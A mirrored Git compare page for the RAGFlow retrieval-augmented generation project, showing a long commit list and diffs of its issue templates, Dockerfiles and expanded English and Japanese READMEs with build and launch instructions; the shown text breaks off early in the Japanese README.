Mirror of https://github.com/infiniflow/ragflow.git (synced 2025-12-08 20:42:30 +08:00)

Compare commits

423 Commits
| SHA1 | Author | Date | |
|---|---|---|---|
| 3413f43b47 | |||
| f8aa31b159 | |||
| 669d634d74 | |||
| 59417016a8 | |||
| 1eb1f7ad33 | |||
| 98295caffe | |||
| f5dc94fc85 | |||
| c889ef6363 | |||
| 593c20889d | |||
| fce3f6df8e | |||
| 61557a101a | |||
| 1f967191d4 | |||
| 0f597b9817 | |||
| 1cff117dc9 | |||
| e3f5464457 | |||
| 6144a109ab | |||
| b3ebc66b13 | |||
| dcb3fb2073 | |||
| f4674ae9d0 | |||
| de610091eb | |||
| d57a68bc2a | |||
| a2eb0df875 | |||
| edc61e9b4c | |||
| 472fcba7af | |||
| 74ec3bc4d9 | |||
| a3f4258cfc | |||
| cf542e80b3 | |||
| 957cd55e4a | |||
| 25a8c076bf | |||
| 306108fe0e | |||
| daaf6aed50 | |||
| 3b50389ee7 | |||
| 258c9ea644 | |||
| acd78c5ef2 | |||
| 1d3e4844a5 | |||
| 4122695a1a | |||
| 3ccb62910b | |||
| a6765e9ca4 | |||
| dec3bf7503 | |||
| 745e98e56a | |||
| 1defc83506 | |||
| 65e59862e4 | |||
| 477a52620f | |||
| 7c9ea5cad9 | |||
| f6159ee4d3 | |||
| a7423e3a94 | |||
| 25c4c717cb | |||
| f9adeb9647 | |||
| 04487d1bce | |||
| 68b9a857c2 | |||
| 5fa3c2bdce | |||
| b5389f487c | |||
| 8b1c145e56 | |||
| 92e9320657 | |||
| 5eb21b9c7c | |||
| 4542346f18 | |||
| fc7cc1d36c | |||
| 751447bd4f | |||
| f26d01dfa3 | |||
| cd3c739982 | |||
| 44c7a0e281 | |||
| 8c9b54db31 | |||
| 6a7c2112f7 | |||
| 0acf4194ca | |||
| 89004f1faf | |||
| 5a36866cf2 | |||
| c8523dc6fd | |||
| 840e921e96 | |||
| 5a1e01d96f | |||
| fbb8cbfc67 | |||
| 0ce720a247 | |||
| 47926a95ae | |||
| ff8793a031 | |||
| a95c1d45f0 | |||
| 45853505bb | |||
| b3f782b3d3 | |||
| 16a1d24a02 | |||
| a943aefa4d | |||
| 038ca8c0ea | |||
| fa5695c250 | |||
| e43208a1ca | |||
| fef663a59d | |||
| 83b91d90fe | |||
| f6ae8fcb71 | |||
| d1ea429bdd | |||
| b75bb1d8d3 | |||
| 6c6f5a3a47 | |||
| 80163c043e | |||
| 9fcf9a10c6 | |||
| 38bd02f402 | |||
| 9a0736b20f | |||
| 4fcd05ad23 | |||
| f8fe4154e8 | |||
| 57970570ee | |||
| d185a2e7f2 | |||
| a4ea5a120b | |||
| 15bf9f8c25 | |||
| 18f4a6b35c | |||
| f7cdb2678c | |||
| 3c1444ab19 | |||
| fb56a29478 | |||
| e99e8b93fb | |||
| 5ec19b5f53 | |||
| 0b90aab22c | |||
| fe1805fa0e | |||
| f73f7b969c | |||
| 81d1c5a695 | |||
| 8d667d5abd | |||
| 01ad2e5296 | |||
| fcdda9f8c5 | |||
| e35f7610e7 | |||
| 7920a5c78d | |||
| 4d957f2d3b | |||
| a89389a05a | |||
| d9a9be4b4c | |||
| 6be3626372 | |||
| 1eb4caf02a | |||
| f04fb36c26 | |||
| 747e69ef68 | |||
| c68767acdd | |||
| 4447039a4c | |||
| 90975460af | |||
| 7dc39cbfa6 | |||
| a25d32496c | |||
| 2023fdc13e | |||
| 64c83f300a | |||
| 3b7b6240c3 | |||
| e05395d2a7 | |||
| 169281958b | |||
| abcd3d2469 | |||
| 2cc89211f6 | |||
| 0e3a877e5c | |||
| da64cfd173 | |||
| ff5ea266d2 | |||
| 8902d92d0e | |||
| e28d13e3b4 | |||
| 0b92f02672 | |||
| cf2f6592dd | |||
| 97ced2f667 | |||
| 7eb69fe6d9 | |||
| 68a698655a | |||
| f900e432f3 | |||
| 267d6b28be | |||
| 706985c188 | |||
| 59efba3d87 | |||
| 22468a8590 | |||
| d0951ee27b | |||
| 31da511d1d | |||
| f8d0d657fb | |||
| 923c3b8cac | |||
| 2ff1b410b9 | |||
| f65d6a957b | |||
| 722c342d56 | |||
| dbdae8e83c | |||
| 6399a4fde2 | |||
| 631753f1a9 | |||
| ad87825a1b | |||
| b04f0510f9 | |||
| 1552dca28d | |||
| db35e9df4f | |||
| d9dc183a0e | |||
| 195498daaa | |||
| 4454ba7a1e | |||
| 72c6784ff8 | |||
| b6980d8a16 | |||
| 39ac3b1e60 | |||
| b8eedbdd86 | |||
| 8295979bb2 | |||
| 037657c1ce | |||
| 4fba0427eb | |||
| c74d4d683e | |||
| 0b15c47d70 | |||
| 7d41de42a1 | |||
| 9517a27844 | |||
| cc064040a2 | |||
| cdea1d0a85 | |||
| 1de31ca9f6 | |||
| 4ec845c0a6 | |||
| c58a1c48eb | |||
| fefe7124a1 | |||
| ebdc283cd5 | |||
| 260c68f60c | |||
| 5d2f7136dd | |||
| b85c15cc96 | |||
| 9ed0e50f6b | |||
| b9bb11879f | |||
| dc7afe46fb | |||
| 4f4d8baf49 | |||
| 83803a72ee | |||
| c3c2515691 | |||
| 117a173fff | |||
| 77363a0875 | |||
| 843720f958 | |||
| f077b57f8b | |||
| c62834f870 | |||
| 0171082cc5 | |||
| 8dd45459be | |||
| dded365b8d | |||
| 9fdd517af6 | |||
| 2604ded2e4 | |||
| 758eb03ccb | |||
| e0d05a3895 | |||
| 614defec21 | |||
| e1f0644deb | |||
| a135f9f5b6 | |||
| daa4799385 | |||
| 495a6434ec | |||
| 21aac545d9 | |||
| 0f317221b4 | |||
| a427672229 | |||
| 196f2b445f | |||
| 5041677f11 | |||
| 7eee193956 | |||
| 9ffd7ae321 | |||
| ec6ae744a1 | |||
| d9bc093df1 | |||
| 571aaaff22 | |||
| 7d8e03ec38 | |||
| 65677f65c9 | |||
| 89d296feab | |||
| 3ae8a87986 | |||
| 46454362d7 | |||
| 55fb96131e | |||
| 20b57144b0 | |||
| 9e3a0e4d03 | |||
| c0d71adaa2 | |||
| 735bdf06a4 | |||
| fe18627ebc | |||
| 4cda40c3ef | |||
| 1e5c5abe58 | |||
| 6f99bbbb08 | |||
| 3bbdf3b770 | |||
| 070b53f3bf | |||
| eb51ad73d6 | |||
| fbd0d74053 | |||
| 170186ee4d | |||
| ed184ed87e | |||
| 43412571f7 | |||
| 17489e6c6c | |||
| 21453ffff0 | |||
| be13429d05 | |||
| 5178daeeaf | |||
| d5b8d8e647 | |||
| b62a20816e | |||
| 3cae87a902 | |||
| 1797f5ce31 | |||
| fe4b2e4670 | |||
| 250119e03a | |||
| bae376a479 | |||
| 6c32f80bc9 | |||
| 7e74546b73 | |||
| 25781113f9 | |||
| 16fa7db737 | |||
| a12fcf9156 | |||
| c27c02ea67 | |||
| 71068895ae | |||
| 93b35f4e58 | |||
| 9a01d1b876 | |||
| a7bd427116 | |||
| 2b36283712 | |||
| 6683179d6a | |||
| 673a28e492 | |||
| 2bfacd0469 | |||
| b3c923da6b | |||
| a1586e0af9 | |||
| f6a599461f | |||
| 081f922ee6 | |||
| 9f0f5b45cc | |||
| a2a6a35e94 | |||
| 9e5d501e83 | |||
| 4ca176bd41 | |||
| c3bc72dfd9 | |||
| 2dd705fe68 | |||
| d1614107e2 | |||
| 05fa3aeb08 | |||
| e73ce39b66 | |||
| d54d1375a5 | |||
| c6c9dbde64 | |||
| 95f809187e | |||
| d6772f5dd7 | |||
| 63ca15c595 | |||
| 7b144cc086 | |||
| 1c4e92ed35 | |||
| 10e83f26dc | |||
| 6ff63ee2ba | |||
| 12b4c5668c | |||
| baad35df30 | |||
| 5effbfac80 | |||
| 4d47b2b459 | |||
| d8c080ee52 | |||
| 626ace8639 | |||
| 1e923f1c90 | |||
| 234afb25d8 | |||
| aa1c915d6e | |||
| 77b1520b66 | |||
| 6b06ccead4 | |||
| 282f0857a3 | |||
| d7744f5870 | |||
| 9b21b66f23 | |||
| aa03dfa453 | |||
| 69b7c61498 | |||
| 8769619bb1 | |||
| ffe5737f7d | |||
| 04a9e95161 | |||
| 91b4a18c47 | |||
| 33eaf6fa2e | |||
| d65ba3e4d7 | |||
| bef1bbdf3e | |||
| 6b36f31f92 | |||
| 648a2baaa9 | |||
| 9392b8bc8f | |||
| 4153a36683 | |||
| bca63ad571 | |||
| 793e29f23a | |||
| 99be226c7c | |||
| 7ddb2f19be | |||
| c28f7b5d38 | |||
| 48607c3cfb | |||
| d15ba37313 | |||
| a553dc8dbd | |||
| eb27a4309e | |||
| 48e1534bf4 | |||
| e9d19c4684 | |||
| 8d6d7f6887 | |||
| a6e4b74d94 | |||
| a5aed2412f | |||
| 2810c60757 | |||
| 62afcf5ac8 | |||
| a74c755d83 | |||
| 7013d7f620 | |||
| de839fc3f0 | |||
| c6b6c748ae | |||
| ca5acc151a | |||
| 385dbe5ab5 | |||
| 3050a8cb07 | |||
| 9c77d367d0 | |||
| 5f03a4de11 | |||
| 290e5d958d | |||
| 9703633a57 | |||
| 7d3b68bb1e | |||
| c89f3c3cdb | |||
| 5d7f573379 | |||
| cab274f560 | |||
| 7059ec2298 | |||
| 674b3aeafd | |||
| 4c1476032d | |||
| 2af74cc494 | |||
| 38f0cc016f | |||
| 6874c6f3a7 | |||
| 8acc01a227 | |||
| 8c07992b6c | |||
| aee8b48d2f | |||
| daf215d266 | |||
| cdcc779705 | |||
| d589b0f568 | |||
| 9d60a84958 | |||
| aadb9cbec8 | |||
| 038822f3bd | |||
| ae501c58fa | |||
| 944776f207 | |||
| f1c98aad6b | |||
| ab06f502d7 | |||
| 6329339a32 | |||
| 84b39c60f6 | |||
| eb62c669ae | |||
| f69ff39fa0 | |||
| b1cd203904 | |||
| b75d75e995 | |||
| 76c477f211 | |||
| 1b01c4fe69 | |||
| 188f3ddfc5 | |||
| 1dcd439c58 | |||
| 26003b5076 | |||
| 4130e5c5e5 | |||
| d0af2f92f2 | |||
| 66f8d35632 | |||
| cf9b554c3a | |||
| aeabc0c9a4 | |||
| 9db44da992 | |||
| 51e7697df7 | |||
| b06d6395bb | |||
| b79f0b0cac | |||
| fe51488973 | |||
| 5d1803c31d | |||
| bd76a82c1f | |||
| 2bc9a7cc18 | |||
| 2d228dbf7f | |||
| 369400c483 | |||
| 6405041b4d | |||
| aa71462a9f | |||
| 72384b191d | |||
| 0dfc8ddc0f | |||
| 78402d9a57 | |||
| b448c212ee | |||
| 0aaade088b | |||
| a38e163035 | |||
| 3610e1e5b4 | |||
| 11949f9f2e | |||
| b8e58fe27a | |||
| fc87c20bd8 | |||
| dee6299ddf | |||
| 101df2b470 | |||
| c055f40dff | |||
| 7da3f88e54 | |||
| 10b79effab | |||
| 7e41b4bc94 | |||
| ed6081845a | |||
| cda7b607cb | |||
| 962c66714e | |||
| 39f1feaccb | |||
| 1dada69daa | |||
| fe2f5205fc | |||
| ac574af60a | |||
| 0499a3f621 | |||
| 453c29170f | |||
| e8570da856 | |||
| dd7559a009 | |||
| 3719ff7299 | |||
| 800b5c7aaa | |||
| f12f30bb7b | |||
| 30846c83b2 | |||
| 2afe7a74b3 | |||
| d4e0bfc8a5 ||||
.gitattributes (vendored, new file, 1 line)

@@ -0,0 +1 @@
+*.sh text eol=lf
.github/ISSUE_TEMPLATE/bug_report.yml (vendored, 2 changes)

@@ -1,5 +1,5 @@
 name: Bug Report
-description: Create a bug issue for infinity
+description: Create a bug issue for RAGFlow
 title: "[Bug]: "
 labels: [bug]
 body:
.github/ISSUE_TEMPLATE/feature_request.md (vendored, 2 changes)

@@ -1,7 +1,7 @@
 ---
 name: Feature request
 title: '[Feature Request]: '
-about: Suggest an idea for Infinity
+about: Suggest an idea for RAGFlow
 labels: ''
 ---
.github/ISSUE_TEMPLATE/feature_request.yml (vendored, 2 changes)

@@ -1,5 +1,5 @@
 name: Feature request
-description: Propose a feature request for infinity.
+description: Propose a feature request for RAGFlow.
 title: "[Feature Request]: "
 labels: [feature request]
 body:
.github/ISSUE_TEMPLATE/question.yml (vendored, 2 changes)

@@ -1,5 +1,5 @@
 name: Question
-description: Ask questions on infinity
+description: Ask questions on RAGFlow
 title: "[Question]: "
 labels: [question]
 body:
.github/ISSUE_TEMPLATE/subtask.yml (vendored, 2 changes)

@@ -1,5 +1,5 @@
 name: Subtask
-description: "Propose a subtask for infinity"
+description: "Propose a subtask for RAGFlow"
 title: "[Subtask]: "
 labels: [subtask]
.github/pull_request_template.md (vendored, 5 changes)

@@ -2,16 +2,11 @@

_Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._

Issue link:#[Link the issue here]

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Breaking Change (fix or feature that could cause existing functionality not to work as expected)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Test cases
- [ ] Python SDK impacted, Need to update PyPI
- [ ] Other (please describe):
.gitignore (vendored, 15 additions)

@@ -21,3 +21,18 @@ Cargo.lock
 .idea/
 .vscode/
+
+# Exclude Mac generated files
+.DS_Store
+
+# Exclude the log folder
+docker/ragflow-logs/
+/flask_session
+/logs
+rag/res/deepdoc
+
+# Exclude sdk generated files
+sdk/python/ragflow.egg-info/
+sdk/python/build/
+sdk/python/dist/
+sdk/python/ragflow_sdk.egg-info/
@@ -1,20 +1,22 @@
-FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
+FROM infiniflow/ragflow-base:v2.0
 USER root

 WORKDIR /ragflow

 ADD ./web ./web
-RUN cd ./web && npm i && npm run build
+RUN cd ./web && npm i --force && npm run build

 ADD ./api ./api
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
+ADD ./graph ./graph

 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com

 ADD docker/entrypoint.sh ./entrypoint.sh
+ADD docker/.env ./
 RUN chmod +x ./entrypoint.sh

 ENTRYPOINT ["./entrypoint.sh"]
Dockerfile.arm (new file, 33 lines)

@@ -0,0 +1,33 @@
+FROM python:3.11
+USER root
+
+WORKDIR /ragflow
+
+COPY requirements_arm.txt /ragflow/requirements.txt
+RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
+    python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
+
+RUN apt-get update && \
+    apt-get install -y curl gnupg && \
+    rm -rf /var/lib/apt/lists/*
+
+RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
+    apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
+
+ADD ./web ./web
+RUN cd ./web && npm i --force && npm run build
+
+ADD ./api ./api
+ADD ./conf ./conf
+ADD ./deepdoc ./deepdoc
+ADD ./rag ./rag
+ADD ./graph ./graph
+
+ENV PYTHONPATH=/ragflow/
+ENV HF_ENDPOINT=https://hf-mirror.com
+
+ADD docker/entrypoint.sh ./entrypoint.sh
+ADD docker/.env ./
+RUN chmod +x ./entrypoint.sh
+
+ENTRYPOINT ["./entrypoint.sh"]
@@ -1,4 +1,4 @@
-FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
+FROM infiniflow/ragflow-base:v2.0
 USER root

 WORKDIR /ragflow

@@ -9,7 +9,7 @@ RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url

 ADD ./web ./web
-RUN cd ./web && npm i && npm run build
+RUN cd ./web && npm i --force && npm run build

 ADD ./api ./api
 ADD ./conf ./conf

@@ -30,11 +30,12 @@ ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
 ADD ./requirements.txt ./requirements.txt
+ADD ./graph ./graph

 RUN apt install openmpi-bin openmpi-common libopenmpi-dev
 ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
 RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
-RUN cd ./web && npm i && npm run build
+RUN cd ./web && npm i --force && npm run build
 RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt

 RUN apt-get update && \
Dockerfile.scratch.oc9 (new file, 57 lines)

@@ -0,0 +1,57 @@
+FROM opencloudos/opencloudos:9.0
+USER root
+
+WORKDIR /ragflow
+
+RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
+
+RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
+    bash ~/miniconda.sh -b -p /root/miniconda3 && \
+    rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
+    echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
+    echo "conda activate base" >> ~/.bashrc
+
+ENV PATH /root/miniconda3/bin:$PATH
+
+RUN conda create -y --name py11 python=3.11
+
+ENV CONDA_DEFAULT_ENV py11
+ENV CONDA_PREFIX /root/miniconda3/envs/py11
+ENV PATH $CONDA_PREFIX/bin:$PATH
+
+# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
+RUN dnf install -y nodejs
+
+RUN dnf install -y nginx
+
+ADD ./web ./web
+ADD ./api ./api
+ADD ./conf ./conf
+ADD ./deepdoc ./deepdoc
+ADD ./rag ./rag
+ADD ./requirements.txt ./requirements.txt
+ADD ./graph ./graph
+
+RUN dnf install -y openmpi openmpi-devel python3-openmpi
+ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
+ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
+RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
+RUN cd ./web && npm i --force && npm run build
+RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
+RUN conda run -n py11 pip install redis
+
+RUN dnf update -y && \
+    dnf install -y glib2 mesa-libGL && \
+    dnf clean all
+
+RUN conda run -n py11 pip install ollama
+RUN conda run -n py11 python -m nltk.downloader punkt
+RUN conda run -n py11 python -m nltk.downloader wordnet
+
+ENV PYTHONPATH=/ragflow/
+ENV HF_ENDPOINT=https://hf-mirror.com
+
+ADD docker/entrypoint.sh ./entrypoint.sh
+RUN chmod +x ./entrypoint.sh
+
+ENTRYPOINT ["./entrypoint.sh"]
README.md (188 changes)

@@ -11,19 +11,69 @@
 </p>

 <p align="center">
+  <a href="https://github.com/infiniflow/ragflow/releases/latest">
+    <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
+  </a>
   <a href="https://demo.ragflow.io" target="_blank">
-    <img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
+    <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
   <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
-    <img src="https://img.shields.io/badge/docker_pull-ragflow:v1.0-brightgreen"
-        alt="docker pull infiniflow/ragflow:v0.2.0"></a>
+    <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
   <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
-    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
+    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
   </a>
 </p>

+<h4 align="center">
+  <a href="https://ragflow.io/docs/dev/">Document</a> |
+  <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
+  <a href="https://twitter.com/infiniflowai">Twitter</a> |
+  <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
+  <a href="https://demo.ragflow.io">Demo</a>
+</h4>
+
+<details open>
+<summary><b>📕 Table of Contents</b></summary>
+
+- 💡 [What is RAGFlow?](#-what-is-ragflow)
+- 🎮 [Demo](#-demo)
+- 📌 [Latest Updates](#-latest-updates)
+- 🌟 [Key Features](#-key-features)
+- 🔎 [System Architecture](#-system-architecture)
+- 🎬 [Get Started](#-get-started)
+- 🔧 [Configurations](#-configurations)
+- 🛠️ [Build from source](#-build-from-source)
+- 🛠️ [Launch service from source](#-launch-service-from-source)
+- 📚 [Documentation](#-documentation)
+- 📜 [Roadmap](#-roadmap)
+- 🏄 [Community](#-community)
+- 🙌 [Contributing](#-contributing)
+
+</details>
+
 ## 💡 What is RAGFlow?

-[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
+[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.

 ## 🎮 Demo

 Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
 </div>

+## 📌 Latest Updates
+
+- 2024-07-08 Supports [Graph](./graph/README.md).
+- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method. Supports extracting images from Docx files. Supports extracting tables from Markdown files.
+- 2024-06-14 Supports PDF in the Q&A parsing method.
+- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in dialog settings.
+- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) reranker models.
+- 2024-05-28 Supports LLM Baichuan and VolcanoArk.
+- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
+- 2024-05-21 Supports streaming output and text chunk retrieval API.
+- 2024-05-15 Integrates OpenAI GPT-4o.
+
 ## 🌟 Key Features

@@ -53,15 +103,6 @@
 - Multiple recall paired with fused re-ranking.
 - Intuitive APIs for seamless integration with business.

-## 📌 Latest Features
-
-- 2024-04-16 Add an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding).
-- 2024-04-16 Add [FastEmbed](https://github.com/qdrant/fastembed) is designed for light and speeding embedding.
-- 2024-04-11 Support [Xinference](./docs/xinference.md) for local LLM deployment.
-- 2024-04-10 Add a new layout recognization model for analyzing Laws documentation.
-- 2024-04-08 Support [Ollama](./docs/ollama.md) for local LLM deployment.
-- 2024-04-07 Support Chinese UI.

 ## 🔎 System Architecture

 <div align="center" style="margin-top:20px;margin-bottom:20px;">

@@ -72,14 +113,15 @@

 ### 📝 Prerequisites

-- CPU >= 2 cores
-- RAM >= 8 GB
+- CPU >= 4 cores
+- RAM >= 16 GB
 - Disk >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
 > If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).

 ### 🚀 Start up the server

-1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):
+1. Ensure `vm.max_map_count` >= 262144:

 > To check the value of `vm.max_map_count`:
 >

@@ -108,12 +150,15 @@

 3. Build the pre-built Docker images and start up the server:

+> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
+
 ```bash
 $ cd ragflow/docker
 $ chmod +x ./entrypoint.sh
 $ docker compose up -d
 ```

 > The core image is about 9 GB in size and may take a while to load.

 4. Check the server status after having the server up and running:

@@ -137,12 +182,13 @@
 * Running on http://x.x.x.x:9380
 INFO:werkzeug:Press CTRL+C to quit
 ```
+> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.

 5. In your web browser, enter the IP address of your server and log in to RAGFlow.
-> In the given scenario, you only need to enter `http://IP_OF_YOUR_MACHINE` (sans port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
+> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
 6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.

-> See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.
+> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.

 _The show is now on!_

@@ -173,15 +219,112 @@ To build the Docker images from source:
 ```bash
 $ git clone https://github.com/infiniflow/ragflow.git
 $ cd ragflow/
-$ docker build -t infiniflow/ragflow:v0.2.0 .
+$ docker build -t infiniflow/ragflow:dev .
 $ cd ragflow/docker
 $ chmod +x ./entrypoint.sh
 $ docker compose up -d
 ```

+## 🛠️ Launch service from source
+
+To launch the service from source:
+
+1. Clone the repository:
+
+```bash
+$ git clone https://github.com/infiniflow/ragflow.git
+$ cd ragflow/
+```
+
+2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
+
+```bash
+$ conda create -n ragflow python=3.11.0
+$ conda activate ragflow
+$ pip install -r requirements.txt
+```
+
+```bash
+# If your CUDA version is higher than 12.0, run the following additional commands:
+$ pip uninstall -y onnxruntime-gpu
+$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
+```
+
+3. Copy the entry script and configure environment variables:
+
+```bash
+# Get the Python path:
+$ which python
+# Get the ragflow project path:
+$ pwd
+```
+
+```bash
+$ cp docker/entrypoint.sh .
+$ vi entrypoint.sh
+```
+
+```bash
+# Adjust configurations according to your actual situation (the following two export commands are newly added):
+# - Assign the result of `which python` to `PY`.
+# - Assign the result of `pwd` to `PYTHONPATH`.
+# - Comment out `LD_LIBRARY_PATH`, if it is configured.
+# - Optional: Add Hugging Face mirror.
+PY=${PY}
+export PYTHONPATH=${PYTHONPATH}
+export HF_ENDPOINT=https://hf-mirror.com
+```
+
+4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
+
+```bash
+$ cd docker
+$ docker compose -f docker-compose-base.yml up -d
+```
+
+5. Check the configuration files, ensuring that:
+
+- The settings in **docker/.env** match those in **conf/service_conf.yaml**.
+- The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
+
+6. Launch the RAGFlow backend service:
+
+```bash
+$ chmod +x ./entrypoint.sh
+$ bash ./entrypoint.sh
+```
+
+7. Launch the frontend service:
+
+```bash
+$ cd web
+$ npm install --registry=https://registry.npmmirror.com --force
+$ vim .umirc.ts
+# Update proxy.target to http://127.0.0.1:9380
+$ npm run dev
+```
+
+8. Deploy the frontend service:
+
+```bash
+$ cd web
+$ npm install --registry=https://registry.npmmirror.com --force
+$ umi build
+$ mkdir -p /ragflow/web
+$ cp -r dist /ragflow/web
+$ apt install nginx -y
+$ cp ../docker/nginx/proxy.conf /etc/nginx
+$ cp ../docker/nginx/nginx.conf /etc/nginx
+$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
+$ systemctl start nginx
+```
+
 ## 📚 Documentation

-- [FAQ](./docs/faq.md)
+- [Quickstart](https://ragflow.io/docs/dev/)
+- [User guide](https://ragflow.io/docs/dev/category/user-guides)
+- [References](https://ragflow.io/docs/dev/category/references)
+- [FAQ](https://ragflow.io/docs/dev/faq)

 ## 📜 Roadmap

@@ -191,7 +334,8 @@ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)

 - [Discord](https://discord.gg/4XxujFgUN7)
 - [Twitter](https://twitter.com/infiniflowai)
+- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

 ## 🙌 Contributing

-RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.
+RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
README_ja.md (133 changes)

@@ -11,19 +11,49 @@
 </p>

 <p align="center">
+  <a href="https://github.com/infiniflow/ragflow/releases/latest">
+    <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
+  </a>
   <a href="https://demo.ragflow.io" target="_blank">
-    <img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
+    <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
   <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
-    <img src="https://img.shields.io/badge/docker_pull-ragflow:v1.0-brightgreen"
-        alt="docker pull infiniflow/ragflow:v0.2.0"></a>
+    <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen"
+        alt="docker pull infiniflow/ragflow:v0.8.0"></a>
   <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
-    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
+    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
   </a>
 </p>

+<h4 align="center">
+  <a href="https://ragflow.io/docs/dev/">Document</a> |
